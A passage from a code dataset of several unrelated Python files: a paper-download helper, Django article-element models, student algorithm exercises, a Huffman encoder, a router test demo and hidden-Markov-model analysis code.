\"supplementary\"\n if from_ftp_end_point:\n key = \"PMCxxxx\" + pmcid[-3:]\n path = self.zipurl.format(key=key, pmcid=pmcid)\n log_key = \"zip\"\n else:\n path = self.suppurl.format(pmcid=pmcid)\n request_handler = requests.get(path)\n if not os.path.isdir(directory_url):\n os.makedirs(directory_url)\n file_exits = False\n for chunk in request_handler.iter_content(chunk_size=128):\n if len(chunk) > 0:\n file_exits = True\n break\n if file_exits:\n self.extract_zip_files(\n request_handler, destination_url, log_key, pmcid)\n else:\n logging.warning(\"%s files not found for %s\", log_key, pmcid)\n\n def extract_zip_files(self, request_handler, destination_url, log_key, pmcid):\n \"\"\"\n\n :param request_handler: param destination_url:\n :param log_key: param pmcid:\n :param destination_url: param pmcid:\n :param pmcid:\n\n \"\"\"\n try:\n z = zipfile.ZipFile(io.BytesIO(request_handler.content))\n self.check_or_make_directory(destination_url)\n z.extractall(destination_url)\n logging.info(\"Wrote %s files for %s\", log_key, log_key)\n except Exception as exception:\n logging.warning(\"%s files not found for %s\", log_key, pmcid)\n logging.debug(exception)\n\n def make_initial_columns_for_paper_dict(self, key_for_dict, resultant_dict):\n \"\"\"Writes the json and csv for searchvaraible dict\n\n :param key_for_dict: id of the paper for which fields will be created\n :param resultant_dict: dict in which the fields will be created\n :returns: dict with the initial fields created for pmcid\n\n \"\"\"\n resultant_dict[key_for_dict] = {}\n self.add_keys_for_conditions(key_for_dict, resultant_dict)\n return resultant_dict\n\n @staticmethod\n def add_keys_for_conditions(key_for_dict, resultant_dict):\n \"\"\"[summary]\n\n :param key_for_dict: [description]\n :type key_for_dict: [type]\n :param resultant_dict: [description]\n :type resultant_dict: [type]\n \"\"\"\n resultant_dict[key_for_dict][\"downloaded\"] = False\n resultant_dict[key_for_dict][\"pdfdownloaded\"] = False\n resultant_dict[key_for_dict][\"jsondownloaded\"] = False\n resultant_dict[key_for_dict][\"csvmade\"] = False\n resultant_dict[key_for_dict][\"htmlmade\"] = False\n\n def make_csv_for_dict(self, df, return_dict, output_main, output_paper):\n \"\"\"\n\n :param df:\n :param return_dict:\n :param output_main:\n :param output_paper:\n\n \"\"\"\n logging.info(\"Making csv files for metadata at %s\", os.getcwd())\n paper = 0\n self.write_or_append_to_csv(df, output_main)\n dict_to_use = self.make_dict_for_csv(return_dict)\n for result in tqdm(dict_to_use):\n paper += 1\n result_encoded = self.url_encode_id(result)\n url = os.path.join(os.getcwd(), result_encoded, output_paper)\n self.check_or_make_directory(\n os.path.join(os.getcwd(), result_encoded))\n df_for_paper = self.make_dataframe_for_paper_dict(\n result, dict_to_use)\n self.write_or_append_to_csv(df_for_paper, url)\n return_dict[result][\"csvmade\"] = True\n logging.debug(\"Wrote csv files for paper %s\", paper)\n\n def make_html_for_dict(self, df, return_dict, output_main, output_paper):\n \"\"\"\n\n :param df:\n :param return_dict:\n :param output_main:\n :param output_paper:\n\n \"\"\"\n logging.info(\"Making html files for metadata at %s\", os.getcwd())\n paper = 0\n htmlurl = os.path.join(os.getcwd(), output_main)\n self.make_html_from_dataframe(df, htmlurl)\n for result in tqdm(return_dict):\n paper += 1\n result_encoded = self.url_encode_id(result)\n url = os.path.join(os.getcwd(), result_encoded, output_paper)\n self.check_or_make_directory(\n os.path.join(os.getcwd(), result_encoded))\n df_for_paper = self.make_dataframe_for_paper_dict(\n result, return_dict)\n self.make_html_from_dataframe(df_for_paper, url)\n return_dict[result][\"htmlmade\"] = True\n logging.debug(\"Wrote xml files for paper %s\", paper)\n\n def make_xml_for_dict(self, return_dict, output_main, output_paper):\n \"\"\"\n\n :param return_dict:\n :param output_main:\n :param output_paper:\n\n \"\"\"\n dict_to_use = self.make_dict_for_csv(return_dict)\n total_xml = dict2xml(dict_to_use, wrap=\"root\", indent=\" \")\n logging.info(\"Making xml files for metadata at %s\", os.getcwd())\n xmlurl = os.path.join(os.getcwd(), output_main)\n with open(xmlurl, \"w\", encoding=\"utf-8\") as file_handler:\n file_handler.write(total_xml)\n paper = 0\n for result in tqdm(dict_to_use):\n paper += 1\n total_xml_of_paper = dict2xml(\n dict_to_use[result], wrap=\"root\", indent=\" \"\n )\n result_encoded = self.url_encode_id(result)\n xmlurl_of_paper = os.path.join(\n os.getcwd(), result_encoded, output_paper)\n\n self.check_or_make_directory(\n os.path.join(os.getcwd(), result_encoded))\n\n with open(xmlurl_of_paper, \"w\", encoding=\"utf-8\") as file_handler:\n file_handler.write(total_xml_of_paper)\n\n logging.debug(\"Wrote xml files for paper %s\", paper)\n\n def handle_creation_of_csv_html_xml(\n self, makecsv, makehtml, makexml, return_dict, name\n ):\n \"\"\"[summary]\n\n :param makecsv: [description]\n :type makecsv: [type]\n :param makehtml: [description]\n :type makehtml: [type]\n :param makexml: [description]\n :type makexml: [type]\n :param return_dict: [description]\n :type return_dict: [type]\n :param name: [description]\n :type name: [type]\n \"\"\"\n dict_to_use = self.make_dict_for_csv(return_dict)\n df = pd.DataFrame.from_dict(dict_to_use)\n if makecsv:\n self.make_csv_for_dict(\n df, return_dict, f\"{name}s.csv\", f\"{name}.csv\")\n if makehtml:\n self.make_html_for_dict(\n df, return_dict, f\"{name}s.html\", f\"{name}.html\")\n if makexml:\n self.make_xml_for_dict(return_dict, f\"{name}s.xml\", f\"{name}.xml\")\n\n @staticmethod\n def url_encode_id(doi_of_paper):\n \"\"\"[summary]\n\n :param doi_of_paper: [description]\n :type doi_of_paper: [type]\n :return: [description]\n :rtype: [type]\n \"\"\"\n url_encoded_doi_of_paper = doi_of_paper.replace(\n \"\\\\\", \"_\").replace(\"/\", \"_\")\n return url_encoded_doi_of_paper\n\n @staticmethod\n def get_version():\n with open(\n os.path.join(os.path.dirname(__file__), \"config.ini\")\n ) as file_handler:\n config_file = file_handler.read()\n config = configparser.RawConfigParser(allow_no_value=True)\n config.read_string(config_file)\n version = config.get(\"pygetpapers\", \"version\")\n return version\n\n @staticmethod\n def make_dict_from_returned_list(total_json_output, key_in_dict):\n \"\"\"[summary]\n\n :param total_json_output: [description]\n :type total_json_output: [type]\n :param key_in_dict: [description]\n :type key_in_dict: [type]\n :return: [description]\n :rtype: [type]\n \"\"\"\n json_return_dict = {}\n for paper in total_json_output:\n json_return_dict[paper[key_in_dict]] = paper\n return json_return_dict\n\n def make_json_files_for_paper(self, returned_dict, key_in_dict, name_of_file):\n \"\"\"[summary]\n\n :param returned_dict: [description]\n :type returned_dict: [type]\n :param key_in_dict: [description]\n :type key_in_dict: [type]\n :param name_of_file: [description]\n :type name_of_file: [type]\n \"\"\"\n self.makejson(f\"{name_of_file}s.json\", returned_dict)\n logging.info(\"Wrote metadata file for the query\")\n paper_numer = 0\n logging.info(\"Writing metadata file for the papers at %s\",\n str(os.getcwd()))\n total_dict = returned_dict[\"total_json_output\"]\n for paper in tqdm(total_dict):\n dict_of_paper = total_dict[paper]\n if not dict_of_paper[\"jsondownloaded\"]:\n paper_numer += 1\n doi_of_paper = dict_of_paper[key_in_dict]\n url_encoded_doi_of_paper = self.url_encode_id(doi_of_paper)\n self.check_or_make_directory(url_encoded_doi_of_paper)\n path_to_save_metadata = os.path.join(\n str(os.getcwd()\n ), url_encoded_doi_of_paper, f\"{name_of_file}.json\"\n )\n dict_of_paper[\"jsondownloaded\"] = True\n self.makejson(path_to_save_metadata, dict_of_paper)\n logging.debug(\n \"Wrote metadata file for the paper %s\", paper_numer)\n\n def make_dict_to_return(\n self, cursor_mark, json_return_dict, total_number_of_results, update\n ):\n \"\"\"[summary]\n\n :param cursor_mark: [description]\n :type cursor_mark: [type]\n :param json_return_dict: [description]\n :type json_return_dict: [type]\n :param total_number_of_results: [description]\n :type total_number_of_results: [type]\n :param update: [description]\n :type update: [type]\n :return: [description]\n :rtype: [type]\n \"\"\"\n dict_to_return = {\n \"total_json_output\": json_return_dict,\n \"total_hits\": total_number_of_results,\n \"cursor_mark\": cursor_mark,\n }\n if update:\n dict_to_return[\"total_json_output\"] = update[\"total_json_output\"].update(\n dict_to_return[\"total_json_output\"]\n )\n return dict_to_return\n","sub_path":"pygetpapers/download_tools.py","file_name":"download_tools.py","file_ext":"py","file_size_in_byte":23962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"38537450","text":"\"\"\"Story child elements\"\"\"\n\nimport logging\nimport re\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.dispatch import receiver\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy as _\nfrom model_utils.models import TimeStampedModel\nfrom requests import request\nfrom requests.exceptions import MissingSchema, Timeout\nfrom slugify import Slugify\n\nfrom apps.photo.models import ImageFile\nfrom utils.decorators import cache_memoize\n\nfrom .mixins import MarkupCharField, MarkupModelMixin, TextContent\n\nslugify = Slugify(max_length=50, to_lower=True)\nlogger = logging.getLogger(__name__)\n\nTOP = 'head'\nDEFAULT_IMAGE_SIZE = (1200, 675) # 16:9 ratio\n\n\nclass ElementQuerySet(models.QuerySet):\n def top(self):\n \"\"\" Elements that are placed at the start of the parent article \"\"\"\n return self.published().filter(placement=TOP)\n\n def inline(self):\n \"\"\" Elements that are placed inside the story \"\"\"\n return self.published().exclude(placement=TOP)\n\n def published(self):\n return self.filter(placement__isnull=False)\n\n def unpublished(self):\n return self.filter(placement__isnull=True)\n\n\nclass StoryChild(TimeStampedModel):\n \"\"\" Models that are placed somewhere inside an article \"\"\"\n objects = ElementQuerySet.as_manager()\n\n class Meta:\n abstract = True\n ordering = ['index']\n\n ordering = models.SmallIntegerField(\n default=0,\n blank=True,\n null=True,\n help_text=_('Internal order within placement'),\n verbose_name=_('ordering'),\n )\n placement = models.CharField(\n max_length=100,\n default='head',\n blank='true',\n help_text=_('Placement of this element'),\n verbose_name=_('placement'),\n )\n\n index = models.PositiveSmallIntegerField(\n default=0,\n blank=True,\n null=True,\n help_text=_('Leave blank to unpublish'),\n verbose_name=_('index'),\n )\n\n @property\n def top(self):\n return self.placement == TOP\n\n @property\n def published(self):\n return bool(self.placement)\n\n def siblings(self):\n return self.__class__.objects.filter(parent_story=self.parent_story)\n\n\nclass Pullquote(TextContent, StoryChild): # type: ignore\n \"\"\" A quote that is that is pulled out of the content. \"\"\"\n\n parent_story = models.ForeignKey(\n 'Story',\n related_name='pullquotes',\n on_delete=models.CASCADE,\n )\n\n class Meta:\n verbose_name = _('Pullquote')\n verbose_name_plural = _('Pullquotes')\n\n\nclass Aside(TextContent, StoryChild): # type: ignore\n \"\"\" Fact box or other information typically placed in side bar \"\"\"\n parent_story = models.ForeignKey(\n 'Story',\n related_name='asides',\n on_delete=models.CASCADE,\n )\n\n class Meta:\n verbose_name = _('Aside')\n verbose_name_plural = _('Asides')\n\n\nclass InlineHtml(StoryChild):\n \"\"\" Inline html code \"\"\"\n\n parent_story = models.ForeignKey(\n 'Story',\n related_name='inline_html_blocks',\n on_delete=models.CASCADE,\n )\n bodytext_html = models.TextField()\n\n class Meta:\n verbose_name = _('Inline HTML block')\n verbose_name_plural = _('Inline HTML blocks')\n\n def get_html(self):\n \"\"\" Returns text content as html. \"\"\"\n return mark_safe(self.bodytext_html)\n\n\ndef ratio(w, h):\n \"\"\"Calculate ratio as float\"\"\"\n return round(h / w, 4)\n\n\nclass StoryMedia(StoryChild, MarkupModelMixin):\n \"\"\" Video, photo or illustration connected to a story \"\"\"\n\n AUTO_RATIO = 0.0\n\n ASPECT_RATIO_CHOICES = [\n (AUTO_RATIO, _('auto')),\n (ratio(5, 2), _('5:2 landscape')),\n (ratio(2, 1), _('2:1 landscape')),\n (ratio(16, 9), _('16:9 landscape (youtube)')),\n (ratio(3, 2), _('3:2 landscape')),\n (ratio(4, 3), _('4:3 landscape')),\n (ratio(1, 1), _('1:1 square')),\n (ratio(3, 4), _('3:4 portrait')),\n (ratio(2, 3), _('2:3 portrait')),\n (ratio(1, 2), _('1:2 portrait')),\n ]\n\n class Meta:\n abstract = True\n\n caption = MarkupCharField(\n max_length=1000,\n help_text=_('Text explaining the media.'),\n verbose_name=_('caption'),\n )\n\n creditline = MarkupCharField(\n max_length=100,\n help_text=_('Extra information about media attribution and license.'),\n verbose_name=_('credit line'),\n )\n\n size = models.PositiveSmallIntegerField(\n default=1,\n help_text=_('Relative image size.'),\n verbose_name=_('image size'),\n )\n\n aspect_ratio = models.FloatField(\n verbose_name=_('aspect ratio'),\n help_text=_('height / width'),\n choices=ASPECT_RATIO_CHOICES,\n default=AUTO_RATIO,\n )\n\n def original_ratio(self):\n \"\"\" Width:Height ratio of the original media file. \"\"\"\n return 2 / 1\n\n def get_height(self, width, height):\n \"\"\" Calculate pixel height based on builtin ratio \"\"\"\n\n if self.aspect_ratio == self.AUTO_RATIO:\n height = height\n else:\n height = width * self.aspect_ratio\n return int(height)\n\n\nclass StoryImage(StoryMedia):\n \"\"\" Photo or illustration connected to a story \"\"\"\n\n class Meta:\n verbose_name = _('Image')\n verbose_name_plural = _('Images')\n unique_together = [('parent_story', 'imagefile')]\n ordering = ['-ordering']\n\n parent_story = models.ForeignKey(\n 'Story',\n related_name='images',\n on_delete=models.CASCADE,\n )\n\n imagefile = models.ForeignKey(\n ImageFile,\n help_text=_('Choose an image by name or upload a new one.'),\n verbose_name=('image file'),\n on_delete=models.CASCADE,\n )\n\n def __str__(self):\n return f'[{self.imagefile}]'\n\n def original_ratio(self):\n try:\n return self.imagefile.full_height / self.imagefile.full_width\n except TypeError:\n logger.warn(\n 'cannot calculate ratio for image %s' % (self.imagefile, )\n )\n return super().original_ratio()\n\n @property\n def filename(self):\n try:\n return str(self.imagefile)\n except ObjectDoesNotExist:\n return '[no image]'\n\n @property\n def small(self):\n return self.imagefile.small\n\n @cache_memoize()\n def large(self):\n return self.imagefile.large.url\n\n @property\n def crop_size(self):\n width, height = DEFAULT_IMAGE_SIZE\n im = self.imagefile\n if self.aspect_ratio == self.AUTO_RATIO:\n if not im.is_photo:\n height = width * self.original_ratio()\n else:\n height = width * self.aspect_ratio\n return int(width), int(height)\n\n @cache_memoize()\n def cropped(self):\n width, height = self.crop_size\n im = self.imagefile\n return im.thumbnail(\n f'{width}x{height}', crop_box=im.get_crop_box(), expand=1\n ).url\n\n\nclass StoryVideo(StoryMedia):\n \"\"\" Video content connected to a story \"\"\"\n\n VIDEO_HOSTS = (\n ('vimeo', _('vimeo')),\n ('youtu', _('youtube')),\n )\n\n class Meta:\n verbose_name = _('Video')\n verbose_name_plural = _('Videos')\n\n parent_story = models.ForeignKey(\n 'Story',\n related_name='videos',\n on_delete=models.CASCADE,\n )\n video_host = models.CharField(\n max_length=20,\n default=VIDEO_HOSTS[0][0],\n choices=VIDEO_HOSTS,\n )\n\n host_video_id = models.CharField(\n max_length=100,\n verbose_name=_('id for video file.'),\n help_text=_(\n 'the part of the url that identifies this particular video'\n )\n )\n\n def embed(self, width=\"100%\", height=\"auto\"):\n \"\"\" Returns html embed code \"\"\"\n if self.video_host == 'vimeo':\n # \n embed_pattern = (\n ''\n )\n elif self.video_host == 'youtu':\n # \n embed_pattern = (\n ''\n )\n else:\n raise Exception('unknown hosting site.')\n\n return embed_pattern.format(\n height=height,\n width=width,\n host_video_id=self.host_video_id,\n )\n\n @property\n def link(self):\n pk = self.host_video_id\n if self.video_host == 'youtu':\n return f'https://www.youtube.com/watch?v={pk}'\n elif self.video_host == 'vimeo':\n return f'https://vimeo.com/{pk}'\n return ''\n\n @classmethod\n def create_from_url(cls, url, parent_story):\n \"\"\" create video object from input url \"\"\"\n\n # url formats:\n # https://www.youtube.com/watch?v=roHl3PJsZPk\n # http://youtu.be/roHl3PJsZPk\n # http://vimeo.com/105149174\n\n def check_link(url, method='head', timeout=2):\n \"\"\" Does a http request to check the status of the url. \"\"\"\n # TODO: check_link() er omtrent lik som metode med samme navn i\n # InlineLink\n try:\n status_code = str(\n request(method, url, timeout=timeout).status_code\n )\n except Timeout:\n status_code = 408 # HTTP Timout\n except MissingSchema:\n status_code = 0 # not a HTTP url\n return status_code\n\n for host in cls.VIDEO_HOSTS:\n hostname = host[0]\n if hostname in url:\n video_host = hostname\n break\n else:\n video_host = None\n\n if not check_link(url) == 200:\n # something is wrong with the url?\n return None\n\n id_regex = r'[a-zA-Z0-9]+$'\n host_video_id = re.search(id_regex, url)\n\n try:\n new_video = cls(\n parent_story=parent_story,\n video_host=video_host,\n host_video_id=host_video_id,\n )\n\n new_video.save()\n return new_video\n except Exception as e:\n logger.debug(e)\n return None\n\n\n@receiver(models.signals.post_save)\ndef story_modified(sender, instance, **kwargs):\n if not issubclass(sender, StoryChild):\n return\n from apps.stories.models import Story\n Story.objects.filter(pk=instance.parent_story.pk\n ).update(modified=instance.modified)\n","sub_path":"django/apps/stories/models/storychildren.py","file_name":"storychildren.py","file_ext":"py","file_size_in_byte":11386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"341529735","text":"#coding: utf-8\n##\n#\n# @author : Olga Maslova, Licence DIM, IUT Annecy le Vieux, FRANCE\n# @brief : a set of generic functions for data management\n\n\"\"\"\n# a variable\na=1 # default type : int\n\n# an empty list\nmylist=[]\n\n#a filled list\nmylist2=[1,2,3]\n\n#append to a list\nmylist.append(10)\n\n#a buggy list\nmybuggylist=[1, 'a', \"Hi\"]\n\n#operators\nb=a+2\nmylist_sum=mylist+mylist2\n\"\"\"\n\ndef average_above_zero(input_list):\n\n #init critical variable\n positive_values_sum=0\n positive_values_count=0\n \n first_item=input_list[0]\n \n #compute the average of positive elements of a list\n for item in input_list:\n #select only positive items \n if item>0:\n positive_values_sum+=item\n positive_values_count+=1\n elif item==0:\n print('This value is null:'+str(item))\n raise ValueError('Zero value is not accepted')\n else:\n print('This value is negative:'+str(item)) \n raise ValueError('Negative value is not accepted')\n #compute the final average\n average=float(positive_values_sum)/float(positive_values_count)\n print('Positive elements average is '+str(average))\n return float(average)\n\"\"\" \n#testing average_above_zero function:\nmylist=[1,2,3,4,-7]\nresult= average_above_zero(mylist)\nprint(str(result))\nmessage='The average of positive items of {list_value) is {res}'.format(list_value=mylist,res=result)\nprint(message)\n\"\"\"\n\n \ndef max_value(input_list):\n ##\n # basic function able to return the max value of a list\n # @param input_list: the input list to be scanned\n # @throws an exception (ValueError) on an empty list\n \n #first check if provided list is not empty\n if len(input_list)==0:\n raise ValueError('provided list is empty')\n \n #init max_value and its index\n max_value=input_list[0]\n max_idx=0\n \n \"\"\" \n #generic style : iterate over the range of list indexes\n for idx in range(len(input_list)):\n if max_value idx: \n index_max-=1\n input_list[idx]=input_list[index_max]\n input_list[index_max]=item\n return input_list\n \n\"\"\"\n#Reverse a table : another way\ndef reverse_table(input_list):\n lastidx=len(input_list)\n for idx in range(len(input_list)/2):\n lastidx-=1\n popped=input_list[idx]\n input_list[idx]=input_list[lastidx]\n input_list[lastidx]=popped\n \n\"\"\"\n\n\"\"\" \n#testing reverse_table\nimport copy\nmylist=[1,5,4,-7]\nlistsave=copy.deepcopy(mylist)\nreverse_table(mylist)\nprint(listsave)\nprint('The reversed list is {newlist}'.format(newlist=mylist))\n\"\"\"\n\n\nimport numpy\nimport time\n\n##Bounding Box\n# calculates the coordinates of the non-zero area in the 2D matrix\n# @param my_mat: the input 2D matrix to be analyzed\n# @throws an exception (ValueError) on an empty matrix, an exception (ValueError) if the matrix does not contain any ones to calculate\n\ndef roi_bbox(my_mat):\n #first check if the input matrix is of certain size\n if len(my_mat) == 0:\n raise ValueError(\"Your matrix is empty!\")\n \n #output coordinates matrix\n bbox_coords=numpy.zeros([4,2],dtype=int)\n a=len(my_mat)\n c=0\n b=len(my_mat[0])\n d=0\n #check if there are ones to counter\n item = 1\n if item in my_mat:\n print(\"You are ok, continue!\")\n else: \n raise ValueError(\"Fill in you matrix first!\")\n \n #check every element of myMat \n for row in range(0,a):\n for col in range(0,b):\n item = my_mat[row,col]\n #if the element is 1, save its index(i,j)\n if item==1:\n if rowc:\n c=row\n if cold:\n d=col \n #populate the coordinates matrix with the values\n bbox_coords[0]=[a,b] \n bbox_coords[1]=[a,d] \n bbox_coords[2]=[c,b] \n bbox_coords[3]=[c,d] \n \n return bbox_coords \n\"\"\"\n##testing roi_bbox\nsize_rows=6\nsize_cols=6\nmyMat=numpy.zeros([size_rows,size_cols], dtype=int)\n#filling the matrix: better way\nmyMat[0:1,4:5]=1\nmyMat[2:4,0:4]=numpy.ones([2,4])\nprint(myMat)\ninit_time=time.time()\nresult_coordinates=roi_bbox(myMat)\nfinish_time=time.time()\nalltime=finish_time-init_time\nprint(result_coordinates)\n\"\"\"\n##Random filling of the matrix\n# fill random K positions with 'X'\n# @param my_mat: the input 2D matrix of type char, K: number of positions to fill \n# @throws an exception (ValueError) on an bad type matrix, an exception (ValueError) on an empty matrix, an exception (ValueError) on negative or superior to matrix's size value of K\ndef random_fill_sparse(my_mat,K): \n #check if the input matrix is of type char\n if str(my_mat.dtype)[:2] != '|S' and str(my_mat.dtype)[:2] != ' len(my_mat) :\n raise ValueError(\"Cannot fill negative nmber of cells or superior of the matrix's size!\")\n #the size of the array \n size_array=len(my_mat) \n #init iteration \n i = 0\n while i myList[ind]:\n min_idx = ind\n #swap two items of the list\n p+=1 \n myList[idx] , myList[min_idx] = myList[min_idx], myList[idx]\n #number of iterations does not depends on the content of the initial vector, but on its length (n) precisely (b)\n #(n²+n)/2 = 28 iterations (where n is the length of the list) needed to sort this list (c)\n #13 of permutations performed it depends on the order of initial list (d), \n #(n²+n)/2 = 28 comparisons applied (e)\n #the complexity is O(n²) \n return myList, i, p\n\"\"\" \n##testing sort_Selective\n#myList = [10, 15, 7, 1, 3, 3, 9]\nmyList = []\nfor i in range(100):\n item = alea(100)\n myList.append(item)\nshuffle(myList)\nprint(myList)\nresults_tuple = sort_Selective(myList)\nprint('Number of iterations is {i}, number of permutations is {p}'.format(i=results_tuple[1], p=results_tuple[2]))\n\n# (g) for n = 50, comparisons = 1275, permutaions : varied\n# for n = 100, comparisons = 5050, permutaions : varied\n# for n = 500, comparisons = 125250, permutaions : varied\n\"\"\"\n\n##\n#Illustration of bubble sorting (a)\ndef sort_bubble(myList):\n #check if the inputlist is not empty\n if len(myList) == 0:\n raise ValueError(\"Your list is empty!\")\n #itirations\n i = 0\n #permutation\n p = 0\n #comparison\n c = 0\n is_sorted = False\n #correction to reduce the length of the list for each outer loop\n m=0\n while is_sorted == False:\n i += 1 \n is_sorted = True\n for idx in range(len(myList)-1-m):\n i += 1\n c += 1\n if myList[idx]>myList[idx+1]:\n is_sorted = False\n #swap two items of the list\n p += 1\n myList[idx], myList[idx+1] = myList[idx+1], myList[idx]\n #print(myList, idx, i, c, p)\n m += 1 \n #number of iterations depends on the content of the initial vector, on its length (n) precisely (b)\n #28 iterations needed to sort this list (c)\n #13 of permutations performed it depends on the order of initial list (d), \n #24 comparisons applied (e)\n #the complexity is O(n²) \n return myList, i, p, c \n\n\"\"\"\n##testing sort_bubble\n#myList = [10, 15, 7, 1, 3, 3, 9]\nmyList = []\nfor i in range(100):\n item = alea(1000)\n myList.append(item)\nshuffle(myList)\nresults_tuple = sort_bubble(myList)\nprint(results_tuple[3])\nprint('Number of iterations is {i}, number of permutations is {p}'.format(i=results_tuple[1], p=results_tuple[2]))\n\n# (g) for n = 50, comparisons varied, permutaions : varied, max is n*(n-1)/2= 1225\n# for n = 100, comparisons varied, permutaions : varied, max is n*(n-1)/2 = 4950\n# for n = 500, comparisons varied, permutaions : varied, max is n*(n-1)/2 = 124750\n\"\"\"\n\n\n\n\n\n\n","sub_path":"assignments/Session1/S1_algotools.py","file_name":"S1_algotools.py","file_ext":"py","file_size_in_byte":11003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"140732978","text":"#!/usr/bin/env python\n\nimport sys\n\ndef print_freqs(set): # for debug\n print([x[0] for x in set])\n\n# get the two lowest frequencies from the set\ndef get_huffman_encoding(set):\n while len(set) > 1:\n lowest, scnd_lowest = (float('inf'),), (float('inf'),)\n # get lowest\n for node in set:\n if node[0] < lowest[0]:\n lowest = node\n elif node[0] < scnd_lowest[0]:\n scnd_lowest = node\n new_node = (lowest[0]+scnd_lowest[0], lowest, scnd_lowest)\n new_list = []\n for node in set:\n if node is not lowest and node is not scnd_lowest:\n new_list.append(node)\n new_list.append(new_node)\n set = new_list\n return set\n\ndef main():\n\tset = []\n\tfor line in sys.stdin.readlines():\n\t\tl = line.split()\n\t\t# we want freq to be first and numeric\n\t\tt = (float(l[1]), l[0])\n\t\tset.append(t)\n\tprint(get_huffman_encoding(set))\n\nif __name__ == \"__main__\": main()\n","sub_path":"huff.py","file_name":"huff.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"216429105","text":"#!/usr/bin/env python-2.4.3\n#\n# October 19 2010, Christian E. Hopps\n#\n# Copyright (c) 2010 by cisco Systems, Inc.\n# All rights reserved.\n\n# Standard Preamble\nimport pdb, sys, os, time\nos.environ['PY_XRUT_ROOT'] = os.path.dirname(os.path.dirname(os.path.abspath(sys.path[0])))\nsys.path[1:1] = [os.environ.get('PY_XRUT_ROOT') + '/modules']\n\n# Import modules we'll use.\nimport xrut, utng, pre, isis\n\n#\n# Topology common to all demos\n#\n# [ one ] --- net1 --- [ two ]\n#\ntopology = xrut.ng_topology_t( { 'net1': ( 'one', 'two' ) },\n toponame=\"demotopo\" )\none = topology.routers['one']\ntwo = topology.routers['two']\n\n#\n# Define a test suite that causes a core to demonstrate it being found\n#\nclass code_cov_suite (utng.test_suite_t):\n gcov_components = [ \"clns/isis\" ]\n gcov_processes = [ \"isis_show\" ]\n\n def test_000_config_isis (self):\n topology.config_topology( {\n 'all-iox': \"\"\"\n router isis ring\n net ${self.net}\n ${self.generate_interface_config(\"address-family ipv4 unicast\")}\n \"\"\"\n })\n preq = pre.prerequisite_t(isis.adjacency_up_pred_t(one, two, one.netifs['net1']), 60)\n preq.assert_test_case()\n\n one.send_command(\"show isis database summary\")\n\n# Execute the test suite.\ntopology.execute_test(code_cov_suite())\n","sub_path":"X-COPY/infra/test/xrut/examples/demo/demo-code-cov.py","file_name":"demo-code-cov.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"636268825","text":"import hmm_decoding_module\nimport hmm_changepoints_module\nimport hmm_outputs_module\nimport hmm_simulation_module\nimport hmm_forward_backwards_module\nimport hmm_BaumWelch_module\nimport numpy as np\n\ndef baum_welch_plus_analysis(smoothers, viterbi, time, data, max_num_bins_composite_bead, max_iterations, concentration, bin_width,\n fraction_of_photons_for_subset, arrayPi, arrayMeanCounts, matrixA, row, final_info_array,\n array_of_composite_bead_arrays, n, max_n, num_for_bead_geometric, max_num_for_bead_geometric, arrayPi_arraytosave, arrayMeanCounts_arraytosave, matrixA_arraytosave):\n print(\"row0 \", row)\n final_info_array, array_of_composite_bead_arrays, row, arrayPi_alliters, arrayMeanCounts_alliters, matrixA_alliters, loglikelihood_alliters = hmm_BaumWelch_module.with_decoding(\n smoothers, viterbi, time, data, max_num_bins_composite_bead, max_iterations, concentration, bin_width,\n fraction_of_photons_for_subset, arrayPi, arrayMeanCounts, matrixA, row, final_info_array,\n array_of_composite_bead_arrays, n, max_n, num_for_bead_geometric)\n matrixA_arraytosave, arrayMeanCounts_arraytosave, arrayPi_arraytosave = hmm_outputs_module.add_hmm_inputs_to_array(\n row, arrayPi_arraytosave, arrayMeanCounts_arraytosave, matrixA_arraytosave, arrayPi_alliters,\n arrayMeanCounts_alliters, matrixA_alliters, num_for_bead_geometric, max_num_for_bead_geometric)\n print(\"row1 \", row)\n\n return arrayPi_alliters, arrayMeanCounts_alliters, matrixA_alliters, loglikelihood_alliters, final_info_array, array_of_composite_bead_arrays, row, arrayPi_arraytosave, arrayMeanCounts_arraytosave, matrixA_arraytosave\n\n\ndef decode_changepoints_compositebead_statistics_savingarrays(smoothers, viterbi, n, forward_likelihood, backwards_likelihood, time, data, max_num_bins_bead, background_mean_counts, row, final_info_array, array_of_composite_bead_arrays, bin_width, concentration, fraction_of_photons_for_subset, loglikelihood, matrixA, arrayMeanCounts, arrayPi, num_iterations, max_iterations, num_for_bead_geometric):\n print(\"Decode, Changepoints, Composite Bead, Statistics, Add to Arrays\")\n if smoothers == 1:\n decoded = hmm_decoding_module.by_smoothers(n, forward_likelihood, backwards_likelihood)\n row, final_info_array, array_of_composite_bead_arrays = changepoints_compositebead_statistics_savingarrays(1, 0, decoded, time, data, max_num_bins_bead,\n background_mean_counts, row, final_info_array,\n array_of_composite_bead_arrays, bin_width, concentration,\n fraction_of_photons_for_subset, loglikelihood, matrixA, arrayMeanCounts,\n num_iterations, max_iterations, num_for_bead_geometric)\n\n if viterbi == 1:\n decoded = hmm_decoding_module.by_viterbi(data, matrixA, arrayMeanCounts, arrayPi)\n row, final_info_array, array_of_composite_bead_arrays = changepoints_compositebead_statistics_savingarrays(0, 1, decoded, time, data, max_num_bins_bead,\n background_mean_counts, row, final_info_array,\n array_of_composite_bead_arrays, bin_width, concentration,\n fraction_of_photons_for_subset, loglikelihood, matrixA, arrayMeanCounts,\n num_iterations, max_iterations, num_for_bead_geometric)\n\n return row, final_info_array, array_of_composite_bead_arrays\n\ndef changepoints_compositebead_statistics_savingarrays(smoothers, viterbi, decoded, time, data, max_num_bins_bead, background_mean_counts, row, final_info_array, array_of_composite_bead_arrays, bin_width, concentration, num_photons_subset, loglikelihood, matrixA, arrayMeanCounts, num_iterations, max_iterations, num_for_bead_geometric):\n changepoint_index = hmm_changepoints_module.get_changepoint_time_index_direction(decoded, time)\n all_beads_plus_dwell, composite_bead_array, num_beads_array = 